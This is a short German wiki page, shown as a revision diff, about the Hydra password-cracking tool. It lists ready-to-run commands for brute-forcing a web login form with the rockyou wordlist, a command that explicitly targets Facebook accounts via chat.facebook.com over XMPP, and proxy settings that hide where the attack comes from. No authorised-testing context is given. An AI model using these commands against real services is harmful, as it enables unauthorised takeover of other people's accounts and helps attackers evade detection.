Hydra: Unterschied zwischen den Versionen

Aus SchnallIchNet
Wechseln zu: Navigation, Suche
(Die Seite wurde neu angelegt: „Nice security-tool... here's an example: hydra -vV -l USERNAME -P ~/Tools/wordlists/rockyou-75.txt HOST|IP \ http-post-form "/login.php:username=^USER^&…“)
 
Zeile 3: Zeile 3:
 
here's an example:
 
here's an example:
  
  hydra -vV -l USERNAME -P ~/Tools/wordlists/rockyou-75.txt HOST|IP \
+
  hydra -vV -t TASKS -l USERNAME -P ~/Tools/wordlists/rockyou-75.txt HOST|IP \
 
       http-post-form "/login.php:username=^USER^&password=^PASS^&submit=Submit:Incorrect"
 
       http-post-form "/login.php:username=^USER^&password=^PASS^&submit=Submit:Incorrect"
  
Zeile 11: Zeile 11:
  
 
* [http://ethicalhack3r.co.uk/files/fuzzing/rockyou-75.txt rockyou-75.txt]
 
* [http://ethicalhack3r.co.uk/files/fuzzing/rockyou-75.txt rockyou-75.txt]
 +
 +
 +
== use a proxy ==
 +
 +
Use HYDRA_PROXY_HTTP/HYDRA_PROXY and HYDRA_PROXY_AUTH environment for a proxy.
 +
 +
HYDRA_PROXY=[http|socks4|socks5]://proxy_addr:proxy_port

Version vom 18. April 2013, 14:28 Uhr

Nice security-tool...

here's an example:

hydra -vV -t TASKS -l USERNAME -P ~/Tools/wordlists/rockyou-75.txt HOST|IP \
      http-post-form "/login.php:username=^USER^&password=^PASS^&submit=Submit:Incorrect"

for facebook use chat.facebook.com:5222 to crack instead of http

hydra -l USERNAME -P ~/Tools/wordlists/rockyou-75.txt chat.facebook.com -s 5222 xmpp


use a proxy

Use HYDRA_PROXY_HTTP/HYDRA_PROXY and HYDRA_PROXY_AUTH environment for a proxy.

HYDRA_PROXY=[http|socks4|socks5]://proxy_addr:proxy_port